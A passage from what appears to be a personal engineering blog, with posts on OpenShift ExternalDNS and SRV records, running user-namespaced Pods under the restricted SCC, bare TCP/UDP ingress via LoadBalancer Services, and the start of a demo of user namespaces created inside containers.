monitor to determine the DNS records to be created/managed. We
configure the controller to watch Service objects. Further
configuration is specified in subfields:

serviceType restricts the type(s) of Service objects to be
considered.
labelFilter can be set to further restrict the set of
source objects by matching on the label field. In this
example, we only match Service objects with label app: echo.
fqdnTemplate specifies how to derive the fully qualified
DNS name from the Service object.
hostnameAnnotation can be set to Allow to allow the FQDN
to be specified via the
external-dns.alpha.kubernetes.io/hostname annotation on the
Service object. The default value is Ignore, in which case
fqdnTemplate is required.


Aside from type: Service, the ExternalDNS CR also recognises
type: OpenShiftRoute. This type uses Route objects as the
source, creating CNAME records to alias the FQDN derived from the
Route object to the canonical DNS name of the ingress controller.
This isn’t the behaviour I’m looking for, so the rest of this
article focuses on the behaviour for Service sources.
Creating the ExternalDNS controller §
Now that we have defined an ExternalDNS custom resource, let’s
create it and see what happens. I would like to watch the logs of
the ExternalDNS Operator during this operation.
Earlier we saw that the name of the operator Pod is
pod/external-dns-operator-594b465984-r2pc5. This Pod has two
containers:
% oc get -o json -n external-dns-operator \
    pod/external-dns-operator-594b465984-r2pc5 \
    | jq '.status.containerStatuses[].name'
"kube-rbac-proxy"
"operator"
The container named operator is the one we are interested in.
We can watch its log output like so:
% oc logs -n external-dns-operator --tail 2 --follow \
    external-dns-operator-594b465984-r2pc5 operator
2022-03-22T04:41:06.625Z        INFO    controller-runtime.manager.controller.external_dns_controller   Starting workers        {"worker count": 1}
2022-03-22T04:41:06.626Z        INFO    controller-runtime.manager.controller.credentials_secret_controller     Starting workers        {"worker count": 1}
... (waiting for more output)
Now, in another terminal, create the ExternalDNS CR object:
% oc create -f externaldns-test.yaml
externaldns.externaldns.olm.openshift.io/test created
Log output shows the ExternalDNS Operator responding to the
appearance of the externaldns/test CR:
controller-runtime.webhook.webhooks     received request        {"webhook": "/validate-externaldns-olm-openshift-io-v1alpha1-externaldns", "UID": "cf2fb876-9ddd-45a8-88b8-5cc0344fb5cc", "kind": "externaldns.olm.openshift.io/v1alpha1, Kind=ExternalDNS", "resource": {"group":"externaldns.olm.openshift.io","version":"v1alpha1","resource":"externaldnses"}}
validating-webhook      validate create {"name": "test"}
controller-runtime.webhook.webhooks     wrote response  {"webhook": "/validate-externaldns-olm-openshift-io-v1alpha1-externaldns", "code": 200, "reason": "", "UID": "cf2fb876-9ddd-45a8-88b8-5cc0344fb5cc", "allowed": true}
external_dns_controller reconciling externalDNS {"externaldns": "/test"}
…
And if we look in the operand namespace (external-dns) we see
a Pod running:
% oc get -n external-dns pod
NAME                                 READY   STATUS    RESTARTS   AGE
external-dns-test-865ffff756-45d44   1/1     Running   0          54s
And if you want to see what an ExternalDNS controller is up to,
you can watch its logs:
% oc logs -n external-dns --tail 1 --follow \
    pod/external-dns-test-865ffff756-45d44
time="2022-03-23T12:26:18Z" level=info msg="All records are already up to date"
... (waiting for more output)
Observing record creation §
After creating the ExternalDNS instance, I found Google Cloud DNS
zone for my cluster and queried its records. How to interact with
the cloud provider depends on which cloud provider the cluster is
hosted on, so I won’t provide details. The existing records are:
ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  NS    21600  ns-gcp-private.googledomains.com.
ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  SOA   21600  ns-gcp-private.googledomains.com.
api.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     60     10.0.0.2
api-int.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     60     10.0.0.2
*.apps.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     30     35.223.148.37

This is a private zone specific to my cluster. Some non-routable
addresses appear. I haven’t figured out how to update the records
in the public zone yet. I’m confident this is not a problem with
ExternalDNS. Rather, I put it down to my lack of familiarity with
how to configure it, and with Google Cloud DNS.

We can see that in addition to the expected NS and SOA records,
there are A records for the API server and a wildcard A record
for the main ingress controller.
Next I create the following Service:
apiVersion: v1
kind: Service
metadata:
  name: echo-tcp
  labels:
    app: echo
spec:
  type: LoadBalancer
  selector:
    app: echo
  ports:
  - name: tcpecho
    protocol: TCP
    port: 12345
Note that it has the app: echo label and has type: LoadBalancer,
satisfying the match criteria of the externaldns/test controller.
Create the service and observe its public IP address:
% oc create -f service-echo.yaml
service/echo-tcp created

% oc get service/echo-tcp \
    -o jsonpath='{.status.loadBalancer}'
{"ingress":[{"ip":"35.188.22.139"}]}
After creating the Service, two new records appeared in the zone:
echo-tcp.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     300    35.188.22.139
external-dns-echo-tcp.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  TXT   300    "heritage=external-dns,external-dns/owner=external-dns-test,external-dns/resource=service/test/echo-tcp"
The A record resolves the DNS name to the load balancer’s IP
address. Nothing surprising here.
The TXT record is the for the name external-dns-echo-tcp.… and
contains some metadata about the “owner” of the corresponding A
record. Specifically, it identifies the Service object that is the
source of the record. I am not 100% sure, but it seems to also
contain information about the ExternalDNS controller that created
the record.
When I first saw the TXT records, I theorised that the ExternalDNS
controller uses the TXT records to find “obsolete” records and
delete them. This would occur, for example, when the Service is
deleted. Indeed, deleting service/echo-tcp resulted in the
removal of both the A and TXT records.
SRV records for LoadBalancer Services §
Kubernetes’ internal DNS system follows a DNS-based service
discovery specification. In addition to A/AAAA
records, SRV records are created to locate service endpoints (port
and target DNS name) based on service name and transport protocol
(TCP or UDP). SRV records are an important part of several
protocols as used in the real world, including Kerberos, SIP, LDAP
and XMPP. SRV records have the following shape:
_._. 
     SRV    
A record to locate an organisation’s LDAP server might look like:
_ldap._tcp.example.net 300
    IN SRV 10 5 389 ldap.corp.example.net
Although the current system has a critical deficiency for
applications that use SRV records and operate on both TCP and UDP
(see my previous blog post)
for most applications it works well. Unfortunately, ExternalDNS
does not follow the DNS spec and does not create SRV records for
Services.
I am not sure why this is the case. Perhaps ExternalDNS even
pre-dates the SRV aspects of the Kubernetes DNS specification. Or
the need might not have been recognised or deemed sufficiently
critical to address this gap.
As it happens, there is an abandoned pull request from two years
ago that sought to add SRV record generation to ExternalDNS and
bring it in line with the spec. The maintainers seemed receptive,
but the PR author no longer needed the feature and closed it. So I
think there is reason to hope that the feature might eventually make
it into ExternalDNS. Perhaps our team will drive it… we need SRV
records, and it would probably be better to enhance ExternalDNS than
to build our own solution from scratch.
SRV records for NodePort services §
I said that ExternalDNS does not support SRV records, but there is
one exception to that. ExternalDNS does create SRV records for
Services of type: NodePort. This is not an appropriate solution
for our application, but we can still play with it and get a feel
for how it might work similarly for LoadBalancer Services.
First, we have to modify externaldns/test to add NodePort to the
list of Service types. Update externaldns-test.yaml:
…
    service:
      serviceType:
        - LoadBalancer
        - NodePort
…
And apply updated configuration:
% oc replace -f externaldns-test.yaml
externaldns.externaldns.olm.openshift.io/test replaced
Now create a new NodePort Service. service-nodeport.yaml:
apiVersion: v1
kind: Service
metadata:
  name: nodeport
  labels:
    app: echo
spec:
  type: NodePort
  selector:
    app: echo
  ports:
  - name: nodeport
    protocol: TCP
    port: 12345
% oc create -f service-nodeport.yaml
service/nodeport created
The ExternalDNS controller log output shows it generating an SRV
record for the Service (wrapped for clarity):
…
time="…" level=debug msg="Endpoints generated from service:
default/nodeport:
[ _nodeport._tcp.nodeport.ci-ln-8hkfrzk-72292.origin-ci-int-gce.dev.rhcloud.com 0
    IN SRV  0 50 30632
    nodeport.ci-ln-8hkfrzk-72292.origin-ci-int-gce.dev.rhcloud.com []
  nodeport.ci-ln-8hkfrzk-72292.origin-ci-int-gce.dev.rhcloud.com 0
    IN A  10.0.0.4;10.0.0.5;10.0.128.3;10.0.128.2;10.0.128.4;10.0.0.3 []
]"
…
Unfortunately, the SRV record didn’t actually make it to the
Google Cloud DNS zone. I haven’t worked out why, yet. The A
record does get created; it’s only the SRV record that is missing.
I’ll update this article if/when I work out why the SRV record
goes.
Conclusion §
The ExternalDNS system is intended to automatically manage public
DNS records for Kubernetes-hosted applications. It can
automatically create CNAME records for OpenShift Routes and
A/AAAA records for Services, including LoadBalancer services.
For applications that use A/AAAA and CNAME records, it works
well.
Unfortunately, SRV records are not well supported. Certainly, it
does not meet the needs of typical applications that use SRV
records. Operators of such applications currently have one of two
options: either manage the records manually (do not want), or
implement the required automation yourselves (e.g. in the
application’s operator program).
The best way forward is to implement better support for SRV
records in ExternalDNS itself, so everyone can benefit through
shared effort and maintainership vested in the Kubernetes SIG. I
shall file a ticket and perhaps restart discussions in the
abandoned pull request with a view to getting this
critical feature on the ExternalDNS roadmap. The extent of
involvement of myself or my team in implementing or driving this
feature work will be determined later.


Running Pods in user namespaces without privileged SCCs
2022-02-02T00:00:00Z
Running Pods in user namespaces without privileged SCCs
In previous posts I demonstrated how to run workloads in an
isolated user namespace on OpenShift. There are still come caveats
to doing this. One of these relates to Security Context
Constraints (SCCs), a security policy mechanism in OpenShift. In
particular, it appeared necessary to admit the Pod via the anyuid
SCC, or one with similar high privileges. This meant that although
the workload itself runs under unprivileged UIDs, the account that
creates the Pod would need privileges to create Pods that run under
arbitrary host UIDs. This is not a desirable situation.
I have investigated that matter further, and it turns out that you
can run a workload in a user namespace even via the default
restricted SCC. But the configuration is not intuitive, and the
reasons why it must be configured that way are convoluted. In
this post I explain the challenges that arise when running a user
namespaced Pod under the restricted SCC, and demonstrate the
solution.

This post assumes a basic knowledge of Security Context Constraints.
If you are unfamiliar with SCCs, the DevConf.cz 2022 presentation
Introduction to Security Context Constraints (slides,
video) by Alberto Losada and Mario Vázquez will bring you up to
speed.

Cluster configuration §
I am testing on an OpenShift 4.10 (pre-release) cluster. Some
changes to worker node configuration are required. The following
MachineConfig object defines those changes:
apiVersion: machineconfiguration.openshift.io/v1
kind: MachineConfig
metadata:
  labels:
    machineconfiguration.openshift.io/role: worker
  name: idm-4-10
spec:
  kernelArguments:
    - systemd.unified_cgroup_hierarchy=1
    - cgroup_no_v1="all"
    - psi=1
  config:
    ignition:
      version: 3.1.0
    systemd:
      units:
      - name: "override-runc.service"
        enabled: true
        contents: |
          [Unit]
          Description=Install runc override
          After=network-online.target rpm-ostreed.service
          [Service]
          ExecStart=/bin/sh -c 'rpm -q runc-1.0.3-992.rhaos4.10.el8.x86_64 || rpm-ostree override replace --reboot https://ftweedal.fedorapeople.org/runc-1.0.3-992.rhaos4.10.el8.x86_64.rpm'
          Restart=on-failure
          [Install]
          WantedBy=multi-user.target
    storage:
      files:
      - path: /etc/subuid
        overwrite: true
        contents:
          source: data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==
      - path: /etc/subgid
        overwrite: true
        contents:
          source: data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==
      - path: /etc/crio/crio.conf.d/99-crio-userns.conf
        overwrite: true
        contents:
          source: data:text/plain;charset=utf-8;base64,W2NyaW8ucnVudGltZS53b3JrbG9hZHMub3BlbnNoaWZ0LXVzZXJuc10KYWN0aXZhdGlvbl9hbm5vdGF0aW9uID0gImlvLm9wZW5zaGlmdC51c2VybnMiCmFsbG93ZWRfYW5ub3RhdGlvbnMgPSBbCiAgImlvLmt1YmVybmV0ZXMuY3JpLW8udXNlcm5zLW1vZGUiLAogICJpby5rdWJlcm5ldGVzLmNyaS1vLmNncm91cDItbW91bnQtaGllcmFyY2h5LXJ3IiwKICAiaW8ua3ViZXJuZXRlcy5jcmktby5EZXZpY2VzIgpdCg==
The main parts of this MachineConfig are:

The kernelArguments enable cgroupsv2, which are not strictly
required for this demo, but are required for running systemd-based
workloads.
The override-runc.service systemd unit installs a custom
version of runc that implements the new OCI Runtime Specification
cgroup ownership semantics.
This should be the default behaviour in future versions of
OpenShift, perhaps as soon as OpenShift 4.11.
/etc/subuid and /etc/subgid provide a sub-id mapping range
for CRI-O to use when creating Pods with user namespaces.
/etc/crio/crio.conf.d/99-crio-userns.conf defines the
io.openshift.userns workload type for CRI-O. It is also not
strictly necessary for this demo but is required for systemd-based
workloads to run successfully. The default CRI-O configuration in
OpenShift 4.10 provides the io.openshift.builder workload type,
which is sufficient if your workload does not need to manage
cgroups.

Aside from the node configuration changes, I (as cluster admin) also
created project and user account to use for the subsequent steps:
% oc new-project test
Now using project "test" on server "https://api.ci-ln-5rkyxfb-72292.origin-ci-int-gce.dev.rhcloud.com:6443".
…

% oc create user test
user.user.openshift.io/test created

% oc adm policy add-role-to-user edit test
clusterrole.rbac.authorization.k8s.io/edit added: "test"
I did not assign any special SCCs to the test user account.

Remember to wait for the Machine Config Operator to finish updating
the worker nodes before proceeding with Pod creation. You can use
oc wait to await this condition:
% oc wait mcp/worker \
    --for condition=updated --timeout=-1s

Problem demonstration §
The objective is to run a Pod in a user namespace, with that Pod
being admitted via the default restricted SCC. We will start with
the following Pod definition:
apiVersion: v1
kind: Pod
metadata:
  name: fedora
  annotations:
    io.openshift.userns: "true"
    io.kubernetes.cri-o.userns-mode: "auto:size=65536"
spec:
  containers:
  - name: fedora
    image: registry.fedoraproject.org/fedora:35-x86_64
    command: ["sleep", "3600"]
The io.openshift.userns annotation selects the CRI-O workload
profile that we added via the MachineConfig above. This profile
enables several other annotations, but does not automatically
execute the Pod in a user namespace. For that, you must also
supply the io.kubernetes.cri-o.userns-mode annotation. Its
argument tells CRI-O to automatically select unique host UID range
of size 65536 to map into the container’s user namespace.
I created the Pod as user test:
% oc --as test create -f pod-fedora.yaml
pod/fedora created
Observe that it was admitted via the restricted SCC:
% oc get -o json pod/fedora \
    | jq '.metadata.annotations."openshift.io/scc"'
"restricted"
Unfortunately, the container is not running:
% oc get -o json pod/fedora \
  | jq '.status.containerStatuses[].state'
{
  "waiting": {
    "message": "container create failed: time=\"2022-02-02T05:43:34Z\" level=error msg=\"container_linux.go:380: starting container process caused: setup user: cannot set uid to unmapped user in user namespace\"\n",
    "reason": "CreateContainerError"
  }
}
The core error message is: cannot set uid to unmapped user in
user namespace. This arises because, in the absense of a
runAsUser specification in the PodSpec, the restricted SCC has
defaulted it to a value from the UID range assigned to the project:
% oc get -o json pod/fedora \
  | jq '.spec.containers[].securityContext.runAsUser'
1000650000
The project UID range allocation is recorded in the project and
namespace annotations:
% oc get -o json project/test namespace/test \
    | jq '.items[].metadata.annotations."openshift.io/sa.scc.uid-range"'
"1000650000/10000"
"1000650000/10000"
OpenShift allocated to project test a range of 10000 UIDs starting
at 1000650000. The error arises because UID 1000650000 is not
mapped in the user namespace. The host UID range may be something
like 200000–265535, whereas the sandbox’s UID range is
0–65535.
I deleted the Pod and will try something different:
% oc delete pod/fedora
pod "fedora" deleted
Let’s say that we want to run the container process as UID 0 in
the Pod’s user namespace, as would be required for a systemd-based
workload. Instead of leaving it to the SCC machinery, I’ll set
runAsUser: 0 in the PodSpec myself:
apiVersion: v1
kind: Pod
metadata:
  name: fedora
  annotations:
    io.openshift.userns: "true"
    io.kubernetes.cri-o.userns-mode: "auto:size=65536"
spec:
  containers:
  - name: fedora
    image: registry.fedoraproject.org/fedora:35-x86_64
    command: ["sleep", "3600"]
    securityContext:
      runAsUser: 0
This time the test user cannot even create the Pod:
% oc --as test create -f pod-fedora.yaml
Error from server (Forbidden): error when creating "pod-fedora.yaml"…
I’ve trimmed the rather long error message, but the core problem is:
spec.containers[0].securityContext.runAsUser: Invalid value:
0: must be in the ranges: [1000650000, 1000659999]
The restricted SCC only allows runAsUser values that fall in the
projects assigned UID range. And this is what we would expect. The
problem is that the admission machinery has no awareness of user
namespaces. It cannot discern that runAsUser: 0 means that we
want to run as UID 0 inside the user namespace, whilst mapped to
an unprivileged UID on the host.
The problem is twofold. First, we are unable to control the UID
mapping that CRI-O gives us, so that it would coincide with the
project’s UID range. Second, the SCC admission checks and
defaulting is oblivious to user namespace. runAsUser is
interpreted as referring to host UIDs, and the restricted SCC
restricts (or defaults) us to values that are not mapped in the
Pod’s user namespace.
Solution §
The map-to-root option in the userns-mode annotation provides a
solution to this dilemma. It takes whatever value runAsUser is,
and ensures that that host UID gets mapped to UID 0 in the Pod
user namespace. The updated PodSpec is:
apiVersion: v1
kind: Pod
metadata:
  name: fedora
  annotations:
    io.openshift.userns: "true"
    io.kubernetes.cri-o.userns-mode:
      "auto:size=65536;map-to-root=true"
spec:
  securityContext:
    runAsUser: 1000650000
  containers:
  - name: fedora
    image: registry.fedoraproject.org/fedora:35-x86_64
    command: ["sleep", "3600"]
Now the Pod is able to run:
% oc --as test create -f pod-fedora.yaml
pod/fedora created

% oc get -o json pod/fedora \
  | jq '.spec.nodeName, .status.containerStatuses[].state'
"ci-ln-fizz88k-72292-9phfc-worker-c-7s99v"
{
  "running": {
    "startedAt": "2022-02-02T06:20:49Z"
  }
}
We can observe the UID mapping:
% oc rsh pod/fedora cat /proc/self/uid_map
         1     265536      65535
         0 1000650000          1
This shows that UID 0 in the Pod’s user namespace maps to UID
10000650000 in the parent (host) user namespace. The remaining
UIDs 1–65536 in the Pod’s user namespace are mapped contiguously
from UID 265536 in the host user namespace.
Objective achieved.
Why runAsUser must be specified §
Referring back to the PodSpec, why is it necessary to explicitly
specify runAsUser? Doesn’t the SCC admission machinery
automatically set the default value? Well… yes, and no. The SCC
machinery defaults runAsUser in each container’s
securityContext field. But it does not set it in the Pod’s
securityContext. And it is the Pod securityContext that CRI-O
examines when processing the map-to-root option. If it is unset,
CRI-O will not set the mapping up properly and container(s) will
fail to run.
The consequence of this is that the user or operator creating the
Pod must first examine the Project or Namespace object to learn what
its assigned UID range is. Then it must set the
spec.securityContext.runAsUser field to the start value of that
range. The range assignment will certainly differ from project to
project so it cannot be hardcoded. This is a bit annoying: more
work for the human operator, or more automation behaviour to
implement and maintain.
The simplest solution I can think of is to enhance the SCC
processing to also set spec.securityContext.runAsUser if it is
unset. Then CRI-O would see the value it needs to see.
Alternatively CRI-O could be enhanced to check the container
securityContext if the runAsUser is not specified in the Pod
securityContext. But to me this seems ill principled because
different containers (in the same Pod) could specify different
values, and there is no obvious “right” way to resolve the
ambiguities.
Using multiple UIDs §
Although I have a nice range of 65536 UIDs mapped in the Pod’s user
namespace, I am not able to run processes as any UID other than 0.
This is beacuse the restricted SCC forcibly omits CAP_SETUID
(among others) from the capability bounding set of the container
process. Complex workloads, including any based on systemd, will
fail to run properly under such a constraint.
The simplest workaround is to admit the Pod via the anyuid SCC.
But that undoes the good outcome achieved in this post!
An intermediate workaround is the create a new SCC that does not
forcibly deprive containers of CAP_SETUID. This entails
administrative overhead.
It also increases the attack surface. The setuid(2) system call
is restricted to UIDs mapped in the UID namespace of the calling
process. If the calling process is in an isolated user namespace
that maps to unprivileged host UIDs, it is safe (up to kernel bugs)
to grant CAP_SETUID to that process. But recall that user
namespaces are still opt-in; by default Pods use the host user
namespace. An SCC can use MustRunAsRange to restrict the
initial container process to running as a user in the project’s
assigned UID range. But if that SCC also lets containers use
CAP_SETUID, then it doesn’t really provide more protection than
anyuid
A more robust solution would be to modify CRI-O to reinstate
CAP_SETUID and related capapbilities when the Pod runs in a user
namespace. I will raise the topic with the CRI-O maintainers, as
solving this problem is important for our use case, and probably
other “legacy” workloads too.
Conclusion §
In this post I demonstrated how to run workloads in a user namespace
on OpenShift, under the default restricted SCC. The map-to-root
option is critical to accomplishing this. There is an unfortunate
“rough edge” in that the workload must specifically refer to the UID
range assigned to the namespace in which the Pod will live, which
means additional work for or complexity in the operator (human or
otherwise).
Despite this progress, if you need to run processes under different
UIDs in the container(s), the restricted UID won’t work because it
deprives the container process of the CAP_SETUID capability. You
must go back to admitting the workload via anyuid or a similar
SCC, which is a significant erosion of the security boundaries
between containers and the host. This issue will be the subject of
future investigations.


Bare TCP and UDP ingress on Kubernetes
2021-11-18T00:00:00Z
Bare TCP and UDP ingress on Kubernetes
Kubernetes and OpenShift have good solutions for routing HTTP/HTTPS
traffic to the right applications. But for ingress of bare TCP
(that is, not HTTP(S) or TLS with SNI) or UDP traffic, the situation
is more complicated. In this post I demonstrate how to use
LoadBalancer Service objects to route bare TCP and UDP traffic to
your Kubernetes applications.
Example service §
For testing purposes I wrote a basic echo server. It listens on
both TCP and UDP port 12345, and merely upper-cases and returns the
data it receives:
import socketserver
import threading

def serve_tcp():
    class Handler(socketserver.StreamRequestHandler):
        def handle(self):
            while True:
                data = self.rfile.readline()
                if not data:
                    break
                self.wfile.write(data.upper())

    with socketserver.TCPServer(('', 12345), Handler) as server:
        server.serve_forever()

def serve_udp():
    class Handler(socketserver.DatagramRequestHandler):
        def handle(self):
            self.wfile.write(self.rfile.read().upper())

    with socketserver.UDPServer(('', 12345), Handler) as server:
        server.serve_forever()

if __name__ == "__main__":
    threading.Thread(target=serve_tcp).start()
    threading.Thread(target=serve_udp).start()
The Containerfile adds this program to the official Fedora 35
container and declares the entry point:
FROM fedora:35-x86_64
COPY echo.py .
CMD [ "python3", "echo.py" ]
I published the container image on Quay.io. The Pod spec
references it:
apiVersion: v1
kind: Pod
metadata:
  name: echo
  labels:
    app: echo
spec:
  containers:
  - name: server
    image: quay.io/ftweedal/udpecho:latest
I defined a new project namespace echo and created the Pod:
% oc new-project echo
Now using project "echo" on server
  "https://api.ci-ln-4ixdypb-72292.origin-ci-int-gce.dev.rhcloud.com:6443".

…

% oc create -f pod-echo.yaml
pod/echo created
Create Service object §
My application is not talking HTTP, so I can’t use the normal
Ingress or Route facilities to get traffic to my app.

HTTP and HTTPS traffic includes the Host header, which the
ingress system can inspect to route requests to a particular Pod.
Similarly, TLS with the Server Name (SNI) extension allows TLS
traffic to be routed to a particular Pod (the Pod will perform the
handshake). Neither approach works for UDP packets or “bare” TCP
connections.

Therefore, I define a LoadBalancer Service. The service
controller will ask the cloud provider to create a load balancer
that routes external traffic into the cluster. For example, on AWS
it will (by default) create an ELB (Elastic Load Balancer)
instance.
apiVersion: v1
kind: Service
metadata:
  name: echo
spec:
  type: LoadBalancer
  selector:
    app: echo
  ports:
  - name: tcpecho
    protocol: TCP
    port: 12345
  - name: udpecho
    protocol: UDP
    port: 12345
OK, let’s create the Service:
% oc create -f service-echo.yaml 
The Service "echo" is invalid: spec.ports: Invalid value:
[]core.ServicePort{core.ServicePort{Name:"tcpecho", Protocol:"TCP",
AppProtocol:(*string)(nil), Port:12345,
TargetPort:intstr.IntOrString{Type:0, IntVal:12345, StrVal:""},
NodePort:0}, core.ServicePort{Name:"udpecho", Protocol:"UDP",
AppProtocol:(*string)(nil), Port:12345,
TargetPort:intstr.IntOrString{Type:0, IntVal:12345, StrVal:""},
NodePort:0}}: may not contain more than 1 protocol when type is
'LoadBalancer'
Well, that’s unfortunate. Kubernetes does not support
LoadBalancer services with mixed protocol. KEP 1435 is in
progress to address this. It is a gated “alpha” feature since
Kubernetes 1.20. Cloud provider support is
currently mixed but work is ongoing.
So for now, I have to create separate Service objects for UDP and
TCP ingress. As a consequence, there will be different public IP
addresses for TCP and UDP. Whether this is a problem depends on
the application. Applications that use SRV records to locate
servers can handle this scenario. Kerberos is such an application
(modern implementations, at least). Applications that use A or
AAAA records directly might have problems.
The other downside is cost. Cloud providers charge money for load
balancer instances. The more you use, the more you pay.
Below is the definition of my decomposed Service objects:
apiVersion: v1
kind: Service
metadata:
  name: echo-udp
spec:
  type: LoadBalancer
  selector:
    app: echo
  ports:
  - name: udpecho
    protocol: UDP
    port: 12345
---
apiVersion: v1
kind: Service
metadata:
  name: echo-tcp
spec:
  type: LoadBalancer
  selector:
    app: echo
  ports:
  - name: tcpecho
    protocol: TCP
    port: 12345
Creating the objects now succeeds:
% oc create -f service-echo.yaml 
service/echo-udp created
service/echo-tcp created
To find out the hostname or IP address of the load balancer ingress
endpoint, inspect the status field of the Service object:
% oc get -o json service \
    | jq -c '.items[] | (.metadata.name, .status)'
"echo-tcp"
{"loadBalancer":{"ingress":[{"ip":"34.136.55.93"}]}}
"echo-udp"
{"loadBalancer":{"ingress":[{"ip":"34.71.82.205"}]}}
Most cloud providers report an IP address. That includes Google
Cloud (GCP) where this cluster was deployed. On the other hand, AWS
reports a DNS name. Below is the result of creating my service
objects on an cluster hosted on AWS:
% oc get -o json service \
    | jq -c '.items[] | (.metadata.name, .status)'
"echo-tcp"
{"loadBalancer":{"ingress":[{"hostname":"a095e8e1ebb9e4c64ae71e0f3c688ad4-608097611.us-east-2.elb.amazonaws.com"}]}}
"echo-udp"
{"loadBalancer":{}}
ELB successfully created a load balancer for the TCP port. But
something is wrong with the UDP service. The events give more
information:
% oc get event --field-selector involvedObject.name=echo-udp
LAST SEEN   TYPE      REASON                   OBJECT             MESSAGE
94s         Normal    EnsuringLoadBalancer     service/echo-udp   Ensuring load balancer
94s         Warning   SyncLoadBalancerFailed   service/echo-udp   Error syncing load balancer: failed to ensure load balancer: Protocol UDP not supported by LoadBalancer
Load balancer creation failed with the error:

Error syncing load balancer: failed to ensure load balancer:
Protocol UDP not supported by LoadBalancer

The workaround is to add an annotation to request a Network Load
Balancer (NLB) instance instead of ELB (the default):
apiVersion: v1
kind: Service
metadata:
  name: echo-udp
  annotations:
    service.beta.kubernetes.io/aws-load-balancer-type: "nlb"
spec:
  …
After adding the annotation, both load balancers are configured:
% oc get -o json service \
    | jq -c '.items[] | (.metadata.name, .status)'
"echo-tcp"
{"loadBalancer":{"ingress":[{"hostname":"a473cf621de6b49dfabb6e933d0fab55-2099420434.us-east-2.elb.amazonaws.com"}]}}
"echo-udp"
{"loadBalancer":{"ingress":[{"hostname":"af7f7ed0f44c9461dbb54a9a4aedca2c-0c5861432365c726.elb.us-east-2.amazonaws.com"}]}}

aws-load-balancer-type is one of several annotations for modifying
AWS load balancer configuration. See the AWS Cloud Provider
documentation for the full list.

Testing the ingress §
Using the IP address or DNS name from the status field, you can
use nc(1) to verify that the server is contactable.
% echo hello | nc 34.136.55.93 12345
HELLO

% nc --udp 34.71.82.205 12345
hello                             -- input
HELLO                             -- response
^D
I was able to talk to my echo server via both TCP and UDP.

If using TLS or DTLS, you could instead use OpenSSL’s s_client(1)
to test connectivity.

Use hostname instead of IP address if that is how the cloud provider
reports the ingress endpoint.
Reaching the service via DNS §
The cloud provider has set up the load balancer and the ingress IP
addresses or hostnames are reported in the status field of the
Service object(s). Now you probably wish to set up DNS records so
that clients can use an established domain name to find the server.
I can’t go deep into this topic in this post, because I am still
exploring this problem space myself. But I can describe some
possible solutions at a high level.
One possibility is to teach your application controller to manage
the required DNS records. It would monitor the Service objects and
reconcile the external DNS configuration with what it sees. The
number and kind of records to be created will vary depending on
whether the cloud providers reports the ingress points as hostnames
or IP addresses:



Ingress endpoint
Resolution method
Records needed




hostname
direct
CNAME


hostname
SRV
SRV


ip
direct
A/AAAA


ip
SRV
A/AAAA and SRV



Most applications have similar needs, so it would make sense to
encapsulate this behaviour in a controller that configures arbitrary
external DNS providers. That’s what the Kubernetes ExternalDNS
project is all about. Provider stability varies; at
time of writing the only stable providers are Google Cloud DNS and
AWS Route 53.
Integration with OpenShift is via the ExternalDNS Operator.
This is an active area of work and ExternalDNS will hopefully be an
officially supported part of OpenShift in a future release.
I haven’t actually played with ExternalDNS yet so can’t say much
more about it at this time. Only that it looks like a very useful
solution!
Finally, recall the caveats I mentioned earlier about applications
that require ingress of both TCP and UDP traffic. KEP 1435,
along with cloud provider support, should resolve this issue
eventually.


Creating user namespaces inside containers
2021-10-15T00:00:00Z
Creating user namespaces inside containers
Over the last year I have experimented with user namespace support in
OpenShift. That is, making OpenShift run workloads inside a
separate user namespace. We’re trying to drive this feature
forward, but some people have reservations. Does having processes
running as root inside a user namespace present an increased
security risk? What if there are kernel bugs…
If you’re worried about the security of user namespaces, OpenShift
or Kubernetes user namespace support doesn’t change the game at all.
As I demonstrate in this post, you can create and use user
namespaces inside your workloads right now.
Demo §
I tested on OpenShift 4.9.0 in the default configuration. So, no
explicit user namespace support. I used a stock Fedora container
image with the following Pod spec:
apiVersion: v1
kind: Pod
metadata:
  name: fedora
spec:
  containers:
  - name: fedora
    image: registry.fedoraproject.org/fedora:34-x86_64
    command: ["sleep", "3600"]
    securityContext:
      capabilities:
        drop:
        - CHOWN
        - DAC_OVERRIDE
        - FOWNER
        - FSETID
        - SETPCAP
        - NET_BIND_SERVICE
The Pod will run under the restricted SCC. I explicitly drop a
number of default capabilities.
Next I created a project named userns, and new user me.
% oc new-project userns
Now using project "userns" on server "https://api.ci-ln-cih2n32-f76d1.origin-ci-int-gce.dev.openshift.com:6443".

You can add applications to this project with the 'new-app' command. For example, try:

    oc new-app rails-postgresql-example

to build a new example application in Ruby. Or use kubectl to deploy a simple Kubernetes application:

    kubectl create deployment hello-node --image=k8s.gcr.io/serve_hostname

% oc create user me
user.user.openshift.io/me created

% oc adm policy add-role-to-user edit me
clusterrole.rbac.authorization.k8s.io/edit added: "me"
Operating as me I created the pod:
% oc --as me create -f pod-fedora.yaml
pod/fedora created
Soon after, the pod is running. I can see what node it is running
on, and its CRI-O container ID:
% oc get -o json pod/fedora \
    | jq '.status.phase,
          .spec.nodeName,
          .status.containerStatuses[0].containerID'
"Running"
"ci-ln-cih2n32-f76d1-sjtwq-worker-a-qr5hr"
"cri-o://d164163951604b7fc9506b3a390ec6a14c76dc6077406fc7b5ffcbf81c406f68"
Next I started a shell in my container. I’ll leave it running for
now, and come back to it later:
% oc exec -it pod/fedora /bin/sh
sh-5.1$
In another terminal, I opened a debug shell on the worker node.
Then I used crictl to find out the process ID (pid) of the main
container process.
% oc debug node/ci-ln-cih2n32-f76d1-sjtwq-worker-a-qr5hr
Starting pod/ci-ln-cih2n32-f76d1-sjtwq-worker-a-qr5hr-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.128.2
If you don't see a command prompt, try pressing enter.
sh-4.4# chroot /host
